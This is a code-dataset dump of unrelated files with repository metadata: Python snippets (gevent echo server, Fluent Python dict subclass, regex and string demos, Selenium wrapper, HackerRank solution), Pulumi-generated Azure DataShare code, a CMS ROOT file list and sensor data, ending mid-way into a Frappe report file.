'1:54022', '1:54029', '1:54034', '1:54060', '1:54091', '1:53443', '1:53945', '1:54033', '1:101436', '1:52953', '1:53307', '1:52915', '1:52986', '1:53121', '1:53339', '1:53479', '1:53489', '1:53575', '1:53587', '1:53594', '1:53603', '1:53699', '1:56476', '1:56877', '1:71689', '1:67104', '1:67111', '1:67129', '1:67141', '1:67161', '1:67163', 
'1:67179', '1:67197', '1:68273', '1:68298', '1:69151', ))
)
readFiles.extend( ['/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Inclusive_scalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/230000/183425A0-2CF9-E911-8A59-0CC47AC17502.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Inclusive_scalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/230000/14013B83-ED0C-EA11-A969-0CC47A4C8E16.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Inclusive_scalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/230000/D8BE5B85-CD00-EA11-8D89-008CFA197DDC.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Inclusive_scalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/230000/8EA49950-280B-EA11-8D88-0CC47A7C353E.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Inclusive_scalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/230000/C80BC002-AE01-EA11-8935-509A4C9EF929.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Inclusive_scalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/230000/94EED3C0-3913-EA11-9D36-003048F1C4AC.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Inclusive_scalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/230000/0CC49EA7-DAFA-E911-B4D9-549F3525C318.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Inclusive_scalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/230000/7ED89422-6000-EA11-91BA-509A4C9EF8FF.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Inclusive_scalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/230000/02A19D30-BF01-EA11-8C20-0CC47AF973C2.root', 
'/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Inclusive_scalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/230000/986C80F8-D001-EA11-B39E-509A4C9F8A64.root']);
|
[
"[email protected]"
] | |
fa65834f183d396f167ddac7d0e3ce217989aeac
|
c065ff2a6a377aea2303b7b8482558049958a7ec
|
/bleach/1561633873/tactile.tac
|
e0b7984bc288e6bd96fb1113990c5d9650654c86
|
[] |
no_license
|
waedbara/vision2tactile
|
7bc9861eecb4247fd254ea58dc508ed18a03b1af
|
edbc9dfee61b4a4b1f0caebb2f16faef090dff32
|
refs/heads/master
| 2022-04-02T20:43:16.621687 | 2019-12-11T08:07:39 | 2019-12-11T08:07:39 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 290 |
tac
|
,3560,3702,3650,3700,3474,3660,3767,3585,3608,3572,3530,3696,3584,3484,3133,3588,3544,3511,3061,2934,3702,3669,3631,3415,2036,2049,1890,2201,2639,2797,3024,2834,3104,3280,3113,3424,3332,3262,2930,3190,3410,3204,3299,3286,3229,3313,3287,2842,2696,3348,3301,3393,3300,2041,2050,2853,2054,2473
|
[
"[email protected]"
] | |
95c9ef6893aed8f628771d2758083ee20acee4bc
|
9795fe1532849a046895cfb0d4b359144ad575dd
|
/stringtest.py
|
a2836ef585b1b18b6d2681aa68771ee248598116
|
[
"MIT"
] |
permissive
|
DBeath/python-snippets
|
36e2df94d20227b897dd8c9345f9f0dfd733f96b
|
c9642c37183d947eb8a1a781e47bd70b1306d5ca
|
refs/heads/master
| 2023-03-25T14:26:59.556635 | 2019-10-19T07:26:31 | 2019-10-19T07:26:31 | 118,523,453 | 0 | 0 |
MIT
| 2021-03-22T16:58:22 | 2018-01-22T22:22:16 |
HTML
|
UTF-8
|
Python
| false | false | 237 |
py
|
# Demonstrates string truthiness: '' is falsy, non-empty strings are truthy.
string = ''
print(string is None)
print(not string)
# BUG FIX: the original compared against the literal '' with 'is'/'is not',
# which tests object identity, relies on CPython string interning, and emits
# a SyntaxWarning on Python 3.8+.  Equality gives the same printed output
# (True / False) and is correct on every implementation.
print(string == '')
print(string != '')
if string:
    print('String is true')
else:
    print('String is false')
print()
string = 'Test'
print(string is None)
print(not string)
|
[
"[email protected]"
] | |
7f9e5d09226cfa9f68d090ddab27a9197d586658
|
d7ec67a5ba315103fa6a6bae6dc045f1fecf7add
|
/normal/FluentPython_code_master/ch03_dict_set/strkeydict0.py
|
a2dc7df2040e476b3431f97d2ab8bc19527f2a50
|
[] |
no_license
|
munezou/PycharmProject
|
cc62f5e4278ced387233a50647e8197e009cc7b4
|
26126c02cfa0dc4c0db726f2f2cabb162511a5b5
|
refs/heads/master
| 2023-03-07T23:44:29.106624 | 2023-01-23T16:16:08 | 2023-01-23T16:16:08 | 218,804,126 | 2 | 1 | null | 2023-02-28T23:58:22 | 2019-10-31T15:57:22 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 1,702 |
py
|
'''
StrKeyDict0 converts non-string keys to `str` on lookup
# BEGIN STRKEYDICT0_TESTS
Tests for item retrieval using `d[key]` notation::
>>> d = StrKeyDict0([('2', 'two'), ('4', 'four')])
>>> d['2']
'two'
>>> d[4]
'four'
>>> d[1]
Traceback (most recent call last):
...
KeyError: '1'
Tests for item retrieval using `d.get(key)` notation::
>>> d.get('2')
'two'
>>> d.get(4)
'four'
>>> d.get(1, 'N/A')
'N/A'
Tests for the `in` operator::
>>> 2 in d
True
>>> 1 in d
False
# END STRKEYDICT0_TESTS
'''
# BEGIN STRKEYDICT0
class StrKeyDict0(dict):
    """Dict subclass that converts non-string keys to `str` on lookup.

    Keys are stored as strings; `d[4]`, `d.get(4)` and `4 in d` all fall
    back to looking up `'4'`.
    """

    def __missing__(self, key):
        # Invoked by dict.__getitem__ only when *key* is absent.
        if not isinstance(key, str):
            # Retry once with the string form; a second miss re-enters
            # __missing__ with a str key and raises below.
            return self[str(key)]
        raise KeyError(key)

    def get(self, key, default=None):
        """Return self[key] (with the str fallback) or *default* if absent."""
        try:
            value = self[key]
        except KeyError:
            return default
        return value

    def __contains__(self, key):
        # Check the key as given first, then its string form.
        return any(candidate in self.keys() for candidate in (key, str(key)))
# END STRKEYDICT0
print('---< start main routine >---')

# Keys are stored as str; int lookups fall back to str(key) via __missing__.
d = StrKeyDict0([('2', 'two'), ('4', 'four')])
print ('d[2] = {0}'.format(d['2']))
print ('d[4] = {0}'.format(d[4]))
'''
------------------------------------------
if index does not exist, occure error
------------------------------------------
'''
try:
    print('d[1] = {0}'.format(d[1]))
except Exception as e:
    # Neither 1 nor '1' is present, so __missing__ raises KeyError('1').
    print(e)
    pass
finally:
    pass
print()
print ('d.get("2") = {0}'.format(d.get('2')))
print ('d.get(4) = {0}'.format(d.get(4)))
'''
---------------------------------------------
--------------------------------------------
'''
# get() with an explicit default never raises for missing keys.
print ('d.get(1, "N/A") = {0}'.format(d.get(1, 'N/A')))
print()
|
[
"[email protected]"
] | |
0b5031a6f7f5e225e262e284fca108ae29536ca9
|
5e6d8b9989247801718dd1f10009f0f7f54c1eb4
|
/sdk/python/pulumi_azure_native/datashare/v20210801/kusto_table_data_set_mapping.py
|
028a2441771fb8ea919a45fda0cdd0950bdf8444
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
vivimouret29/pulumi-azure-native
|
d238a8f91688c9bf09d745a7280b9bf2dd6d44e0
|
1cbd988bcb2aa75a83e220cb5abeb805d6484fce
|
refs/heads/master
| 2023-08-26T05:50:40.560691 | 2021-10-21T09:25:07 | 2021-10-21T09:25:07 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 14,828 |
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = ['KustoTableDataSetMappingArgs', 'KustoTableDataSetMapping']
@pulumi.input_type
class KustoTableDataSetMappingArgs:
    """The set of arguments for constructing a KustoTableDataSetMapping resource."""
    def __init__(__self__, *,
                 account_name: pulumi.Input[str],
                 data_set_id: pulumi.Input[str],
                 kind: pulumi.Input[str],
                 kusto_cluster_resource_id: pulumi.Input[str],
                 resource_group_name: pulumi.Input[str],
                 share_subscription_name: pulumi.Input[str],
                 data_set_mapping_name: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a KustoTableDataSetMapping resource.
        :param pulumi.Input[str] account_name: The name of the share account.
        :param pulumi.Input[str] data_set_id: The id of the source data set.
        :param pulumi.Input[str] kind: Kind of data set mapping.
               Expected value is 'KustoTable'.
        :param pulumi.Input[str] kusto_cluster_resource_id: Resource id of the sink kusto cluster.
        :param pulumi.Input[str] resource_group_name: The resource group name.
        :param pulumi.Input[str] share_subscription_name: The name of the share subscription which will hold the data set sink.
        :param pulumi.Input[str] data_set_mapping_name: The name of the data set mapping to be created.
        """
        pulumi.set(__self__, "account_name", account_name)
        pulumi.set(__self__, "data_set_id", data_set_id)
        # NOTE: the caller-supplied `kind` is intentionally discarded; this
        # discriminated type always pins kind to the literal 'KustoTable'.
        pulumi.set(__self__, "kind", 'KustoTable')
        pulumi.set(__self__, "kusto_cluster_resource_id", kusto_cluster_resource_id)
        pulumi.set(__self__, "resource_group_name", resource_group_name)
        pulumi.set(__self__, "share_subscription_name", share_subscription_name)
        if data_set_mapping_name is not None:
            pulumi.set(__self__, "data_set_mapping_name", data_set_mapping_name)

    @property
    @pulumi.getter(name="accountName")
    def account_name(self) -> pulumi.Input[str]:
        """
        The name of the share account.
        """
        return pulumi.get(self, "account_name")

    @account_name.setter
    def account_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "account_name", value)

    @property
    @pulumi.getter(name="dataSetId")
    def data_set_id(self) -> pulumi.Input[str]:
        """
        The id of the source data set.
        """
        return pulumi.get(self, "data_set_id")

    @data_set_id.setter
    def data_set_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "data_set_id", value)

    @property
    @pulumi.getter
    def kind(self) -> pulumi.Input[str]:
        """
        Kind of data set mapping.
        Expected value is 'KustoTable'.
        """
        return pulumi.get(self, "kind")

    @kind.setter
    def kind(self, value: pulumi.Input[str]):
        pulumi.set(self, "kind", value)

    @property
    @pulumi.getter(name="kustoClusterResourceId")
    def kusto_cluster_resource_id(self) -> pulumi.Input[str]:
        """
        Resource id of the sink kusto cluster.
        """
        return pulumi.get(self, "kusto_cluster_resource_id")

    @kusto_cluster_resource_id.setter
    def kusto_cluster_resource_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "kusto_cluster_resource_id", value)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Input[str]:
        """
        The resource group name.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter(name="shareSubscriptionName")
    def share_subscription_name(self) -> pulumi.Input[str]:
        """
        The name of the share subscription which will hold the data set sink.
        """
        return pulumi.get(self, "share_subscription_name")

    @share_subscription_name.setter
    def share_subscription_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "share_subscription_name", value)

    @property
    @pulumi.getter(name="dataSetMappingName")
    def data_set_mapping_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the data set mapping to be created.
        """
        return pulumi.get(self, "data_set_mapping_name")

    @data_set_mapping_name.setter
    def data_set_mapping_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "data_set_mapping_name", value)
class KustoTableDataSetMapping(pulumi.CustomResource):
    """A Kusto database data set mapping (azure-native datashare v2021-08-01)."""
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 account_name: Optional[pulumi.Input[str]] = None,
                 data_set_id: Optional[pulumi.Input[str]] = None,
                 data_set_mapping_name: Optional[pulumi.Input[str]] = None,
                 kind: Optional[pulumi.Input[str]] = None,
                 kusto_cluster_resource_id: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 share_subscription_name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        A Kusto database data set mapping

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] account_name: The name of the share account.
        :param pulumi.Input[str] data_set_id: The id of the source data set.
        :param pulumi.Input[str] data_set_mapping_name: The name of the data set mapping to be created.
        :param pulumi.Input[str] kind: Kind of data set mapping.
               Expected value is 'KustoTable'.
        :param pulumi.Input[str] kusto_cluster_resource_id: Resource id of the sink kusto cluster.
        :param pulumi.Input[str] resource_group_name: The resource group name.
        :param pulumi.Input[str] share_subscription_name: The name of the share subscription which will hold the data set sink.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: KustoTableDataSetMappingArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        A Kusto database data set mapping

        :param str resource_name: The name of the resource.
        :param KustoTableDataSetMappingArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two overloads above: either a single Args
        # object or individual keyword properties.
        resource_args, opts = _utilities.get_resource_args_opts(KustoTableDataSetMappingArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 account_name: Optional[pulumi.Input[str]] = None,
                 data_set_id: Optional[pulumi.Input[str]] = None,
                 data_set_mapping_name: Optional[pulumi.Input[str]] = None,
                 kind: Optional[pulumi.Input[str]] = None,
                 kusto_cluster_resource_id: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 share_subscription_name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = KustoTableDataSetMappingArgs.__new__(KustoTableDataSetMappingArgs)
            # Required inputs are only enforced when creating a brand new
            # resource (opts.urn unset); lookups by URN skip validation.
            if account_name is None and not opts.urn:
                raise TypeError("Missing required property 'account_name'")
            __props__.__dict__["account_name"] = account_name
            if data_set_id is None and not opts.urn:
                raise TypeError("Missing required property 'data_set_id'")
            __props__.__dict__["data_set_id"] = data_set_id
            __props__.__dict__["data_set_mapping_name"] = data_set_mapping_name
            if kind is None and not opts.urn:
                raise TypeError("Missing required property 'kind'")
            # kind is always pinned to the discriminator literal 'KustoTable'.
            __props__.__dict__["kind"] = 'KustoTable'
            if kusto_cluster_resource_id is None and not opts.urn:
                raise TypeError("Missing required property 'kusto_cluster_resource_id'")
            __props__.__dict__["kusto_cluster_resource_id"] = kusto_cluster_resource_id
            if resource_group_name is None and not opts.urn:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__.__dict__["resource_group_name"] = resource_group_name
            if share_subscription_name is None and not opts.urn:
                raise TypeError("Missing required property 'share_subscription_name'")
            __props__.__dict__["share_subscription_name"] = share_subscription_name
            # Output-only properties start as None and are populated by the engine.
            __props__.__dict__["data_set_mapping_status"] = None
            __props__.__dict__["location"] = None
            __props__.__dict__["name"] = None
            __props__.__dict__["provisioning_state"] = None
            __props__.__dict__["system_data"] = None
            __props__.__dict__["type"] = None
        # Aliases map this resource to the same type in other API versions /
        # the legacy azure-nextgen provider namespace.
        alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:datashare/v20210801:KustoTableDataSetMapping"), pulumi.Alias(type_="azure-native:datashare:KustoTableDataSetMapping"), pulumi.Alias(type_="azure-nextgen:datashare:KustoTableDataSetMapping"), pulumi.Alias(type_="azure-native:datashare/v20181101preview:KustoTableDataSetMapping"), pulumi.Alias(type_="azure-nextgen:datashare/v20181101preview:KustoTableDataSetMapping"), pulumi.Alias(type_="azure-native:datashare/v20191101:KustoTableDataSetMapping"), pulumi.Alias(type_="azure-nextgen:datashare/v20191101:KustoTableDataSetMapping"), pulumi.Alias(type_="azure-native:datashare/v20200901:KustoTableDataSetMapping"), pulumi.Alias(type_="azure-nextgen:datashare/v20200901:KustoTableDataSetMapping"), pulumi.Alias(type_="azure-native:datashare/v20201001preview:KustoTableDataSetMapping"), pulumi.Alias(type_="azure-nextgen:datashare/v20201001preview:KustoTableDataSetMapping")])
        opts = pulumi.ResourceOptions.merge(opts, alias_opts)
        super(KustoTableDataSetMapping, __self__).__init__(
            'azure-native:datashare/v20210801:KustoTableDataSetMapping',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None) -> 'KustoTableDataSetMapping':
        """
        Get an existing KustoTableDataSetMapping resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        # All properties start as None; the engine fills them from the
        # provider's stored state for the given id.
        __props__ = KustoTableDataSetMappingArgs.__new__(KustoTableDataSetMappingArgs)
        __props__.__dict__["data_set_id"] = None
        __props__.__dict__["data_set_mapping_status"] = None
        __props__.__dict__["kind"] = None
        __props__.__dict__["kusto_cluster_resource_id"] = None
        __props__.__dict__["location"] = None
        __props__.__dict__["name"] = None
        __props__.__dict__["provisioning_state"] = None
        __props__.__dict__["system_data"] = None
        __props__.__dict__["type"] = None
        return KustoTableDataSetMapping(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="dataSetId")
    def data_set_id(self) -> pulumi.Output[str]:
        """
        The id of the source data set.
        """
        return pulumi.get(self, "data_set_id")

    @property
    @pulumi.getter(name="dataSetMappingStatus")
    def data_set_mapping_status(self) -> pulumi.Output[str]:
        """
        Gets the status of the data set mapping.
        """
        return pulumi.get(self, "data_set_mapping_status")

    @property
    @pulumi.getter
    def kind(self) -> pulumi.Output[str]:
        """
        Kind of data set mapping.
        Expected value is 'KustoTable'.
        """
        return pulumi.get(self, "kind")

    @property
    @pulumi.getter(name="kustoClusterResourceId")
    def kusto_cluster_resource_id(self) -> pulumi.Output[str]:
        """
        Resource id of the sink kusto cluster.
        """
        return pulumi.get(self, "kusto_cluster_resource_id")

    @property
    @pulumi.getter
    def location(self) -> pulumi.Output[str]:
        """
        Location of the sink kusto cluster.
        """
        return pulumi.get(self, "location")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        Name of the azure resource
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="provisioningState")
    def provisioning_state(self) -> pulumi.Output[str]:
        """
        Provisioning state of the data set mapping.
        """
        return pulumi.get(self, "provisioning_state")

    @property
    @pulumi.getter(name="systemData")
    def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
        """
        System Data of the Azure resource.
        """
        return pulumi.get(self, "system_data")

    @property
    @pulumi.getter
    def type(self) -> pulumi.Output[str]:
        """
        Type of the azure resource
        """
        return pulumi.get(self, "type")
|
[
"[email protected]"
] | |
e5ea4bf5ff824ea3b88eae215aa89ad3e1b1ff1d
|
22b348a0d10519cb1f1da5e886fdf2d3c167cf5a
|
/myweb/test/gevent_/gevent_server.py
|
40d3ecc084fb675cd69f19242f2558e09bd2b098
|
[] |
no_license
|
liuluyang/openstack_mogan_study
|
dab0a8f918ffd17e0a747715998e81304672b75b
|
8624f765da7f5aa0c210f0fa945fc50cf8a67b9e
|
refs/heads/master
| 2021-01-19T17:03:15.370323 | 2018-04-12T09:50:38 | 2018-04-12T09:50:38 | 101,040,396 | 1 | 1 | null | 2017-11-01T02:17:31 | 2017-08-22T08:30:22 |
Python
|
UTF-8
|
Python
| false | false | 872 |
py
|
#coding:utf8
# NOTE(review): Python 2 script (uses print statements).
# Minimal cooperative echo server built on gevent greenlets.
import gevent
from gevent import monkey,socket
monkey.patch_all() # needed so blocking I/O cooperatively yields to other greenlets
s = socket.socket(2,1) # gevent's socket (AF_INET=2, SOCK_STREAM=1); same API as the stdlib one
#s.setsockopt(1,2,1)
s.bind(('',8080))
s.listen(1024)
print 'listening ...8080'
def func_accept():
    # Accept loop: one greenlet is spawned per connected client.
    while 1:
        cs,userinfo = s.accept()
        print('来了一个客户'+str(userinfo))
        g = gevent.spawn(func_recv,cs) # every time a client connects, add one coroutine
def func_recv(cs):
    # Echo loop for a single client; when recv() blocks, control switches
    # to the other greenlets.
    try:
        while 1:
            recv_data = cs.recv(1024)
            print(recv_data)
            if len(recv_data) > 0:
                cs.send(recv_data)
            else:
                # Empty recv means the peer closed the connection.
                cs.close()
                break
    except:
        print cs,'is cut connection'
#g1 = gevent.spawn(func_accept)
#g1.join()
func_accept()
|
[
"[email protected]"
] | |
d0215f9d1c50b64bf0a063ec2baf631dfe83758c
|
2b4790d77439d89ad27bdd04bac539283f0dd605
|
/cookbook/chapter2/2.7_shortest_match.py
|
49bb54fd123247134a394ad7b475f5859077f171
|
[] |
no_license
|
ajioy/python-ex
|
9fde4bcfe35edeee5050365660a03bdb6b913da1
|
982a3cdf0de0e140faa4cb539f2961b311de2c2a
|
refs/heads/master
| 2020-04-05T14:06:09.909935 | 2018-08-14T14:43:55 | 2018-08-14T14:43:55 | 59,105,033 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 334 |
py
|
import re

# Demo: greedy vs. non-greedy matching of double-quoted substrings.
text1 = 'Computer says "no."'
text2 = 'Computer says "no." Phone says "yes."'

# Greedy '.*' consumes as much as possible, so it spans across quotes.
str_pat = re.compile(r'\"(.*)\"')
print(str_pat.findall(text1))
print(str_pat.findall(text2))

# Non-greedy '.*?' stops at the first closing quote.
str_pat = re.compile(r'\"(.*?)\"')
print(str_pat.findall(text2))
|
[
"[email protected]"
] | |
383e36a92c9d5637fc3a45dc325ed151ff97d399
|
8d24fedcadec55acb90aa6eb98d2768a9edf9dba
|
/professional_browser_automation/elements/element.py
|
7d307b17a1d410c53ece73603d055d3403e09961
|
[
"Unlicense"
] |
permissive
|
ikostan/ElegantBrowserAutomationWithPythonAndSelenium
|
bb0a839b775e0a4f6c51b9d8ff1b07cab1624409
|
da087036d74a8fbaec3a2875dad5c45c2a85689c
|
refs/heads/master
| 2020-06-24T12:28:38.152860 | 2019-07-29T06:35:29 | 2019-07-29T06:35:29 | 198,962,805 | 3 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 662 |
py
|
import selenium
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
class Element:
    """Base page element: eagerly locates a WebElement and exposes it read-only.

    :param driver: the selenium WebDriver used for the lookup
    :param locator: locator tuple -- presumably a (By, value) pair; confirm against callers
    """
    def __init__(self, driver: selenium.webdriver, locator: tuple):
        self._driver = driver
        self._locator = locator
        # Resolve the element immediately; raises a timeout if not present.
        self._element = self._find()
    def _find(self):
        '''
        Returns element if located else raises TimeOut exception
        :return:
        '''
        return WebDriverWait(self._driver, 10).until(EC.presence_of_element_located(self._locator))
    @property
    def element(self):
        # The resolved WebElement.
        return self._element
    @property
    def driver(self):
        # The WebDriver this element was located with.
        return self._driver
    @property
    def locator(self):
        # The locator tuple this element was located with.
        return self._locator
|
[
"[email protected]"
] | |
33a3d15ea5ee1796400d25807404e08938591741
|
83cb1b60faf90982aad32c5979856d6064c00e5b
|
/infra_validation_engine/utils/__init__.py
|
3d7325c5de65d3772012e362ee86b426687bffe2
|
[
"Apache-2.0"
] |
permissive
|
boris-vasilev/simple_grid_infra_validation_engine
|
25813b3bfa3f82c8bc964b4ac43089a4fea76015
|
66a1410ca42718d559fd12e1e99dbcbc64457645
|
refs/heads/master
| 2020-09-06T00:58:51.032918 | 2019-10-25T15:24:24 | 2019-10-25T15:24:24 | 220,265,468 | 0 | 0 |
Apache-2.0
| 2019-11-07T15:14:21 | 2019-11-07T15:14:20 | null |
UTF-8
|
Python
| false | false | 386 |
py
|
def get_lightweight_component_hosts(augmented_site_level_config):
    """Return the site's nodes, each annotated with an ssh:// host URI.

    Note: annotates the node dicts in place (adds a 'host' key built from
    the node's 'fqdn'), then returns them in a new list.
    """
    nodes = augmented_site_level_config['site_infrastructure']
    for node in nodes:
        node['host'] = "ssh://{fqdn}".format(fqdn=node['fqdn'])
    return list(nodes)
def get_augmented_site_level_config_file(augmented_site_level_config):
    # TODO: not implemented yet; placeholder that currently returns None.
    pass
|
[
"[email protected]"
] | |
a0af2852cda9a3447ca5115c38f0c38ee2d71b59
|
b815438a597af24018277788200caf5da7c4a611
|
/Python/Compare-the-Triplets.py
|
958faa07f309af0d695639b148fd045d20c1b8ba
|
[] |
no_license
|
Zahidsqldba07/HackeRank-1
|
0338fe204074a544b8f2510ba6702fc0f648e5e7
|
14a04e72d1599a4b8375623781a952dde323acaa
|
refs/heads/master
| 2023-04-23T10:38:05.993784 | 2020-11-01T17:23:49 | 2020-11-01T17:23:49 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,160 |
py
|
"""
Alice and Bob each created one problem for HackerRank. A reviewer rates the two challenges, awarding points on a scale from 1 to 100
for three categories: problem clarity, originality, and difficulty.
We define the rating for Alice's challenge to be the triplet a = (a[0],a[1],a[2]), and the rating for Bob's challenge to be the triplet
b = (b[0],b[1],b[2]).
Your task is to find their comparison points by comparing a[0] with b[0], a[1] with b[1],and a[2] with b[2].
If a[i] > b[i] ,then Alice is awarded point.
If a[i] < b[i] ,then Bob is awarded point.
If a[i] = b[i] ,then neither person receives a point.
Comparison points is the total points a person earned.
Given a and b, determine their respective comparison points.
Function Description
Complete the function compareTriplets in the editor below. It must return an array of two integers, the first being Alice's score
and the second being Bob's.
compareTriplets has the following parameter(s):
a: an array of integers representing Alice's challenge rating
b: an array of integers representing Bob's challenge rating
Input Format
The first line contains 3 space-separated integers a[0], a[1] and, a[2] describing the respective values in triplet a.
The second line contains 3 space-separated integers b[0], b[1] and, b[2] describing the respective values in triplet b.
Output Format
Return an array of two integers denoting the respective comparison points earned by Alice and Bob.
Sample Input 0
5 6 7
3 6 10
Sample Output 0
1 1
Sample Input 1
17 28 30
99 16 8
Sample Output 1
2 1
"""
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the compareTriplets function below.
def compareTriplets(a, b):
    """Compare two rating lists category by category.

    Alice earns a point for every index where a[i] > b[i]; Bob earns a point
    where a[i] < b[i]; ties award nothing. Generalized from the original
    hard-coded range(3) to any equal-length sequences (backward compatible
    for the problem's three categories).

    :param a: Alice's ratings
    :param b: Bob's ratings
    :return: [alice_points, bob_points]
    """
    alice = sum(1 for x, y in zip(a, b) if x > y)
    bob = sum(1 for x, y in zip(a, b) if x < y)
    return [alice, bob]
if __name__ == '__main__':
    # HackerRank harness: read the two space-separated triplets from stdin
    # and write the result to the file named by the OUTPUT_PATH env var.
    fptr = open(os.environ['OUTPUT_PATH'], 'w')
    a = list(map(int, input().rstrip().split()))
    b = list(map(int, input().rstrip().split()))
    result = compareTriplets(a, b)
    fptr.write(' '.join(map(str, result)))
    fptr.write('\n')
    fptr.close()
|
[
"[email protected]"
] | |
a8f7bb875473b5cc4537aa57b46d6f71ae1d2a84
|
9f3981ecd73bd45178013d441a1ef34f860def0b
|
/pos_bahrain/pos_bahrain/report/stock_balance_with_prices/stock_balance_with_prices.py
|
e773fbb9ebeb694178e7719130e9d7ba526b7a73
|
[
"MIT"
] |
permissive
|
azhkhn/pos_bahrain
|
6e139bf02489c298ad8ac963b52ef676515e84f5
|
eae06abb8eb4a9c4465b02178dd981a8ea430511
|
refs/heads/master
| 2020-09-17T07:00:51.068742 | 2019-11-16T09:28:43 | 2019-11-16T09:28:43 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,437 |
py
|
# Copyright (c) 2013, 9t9it and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from functools import partial
from toolz import concatv, compose, valmap, merge
from pos_bahrain.utils import key_by, mapf, filterf
def execute(filters=None):
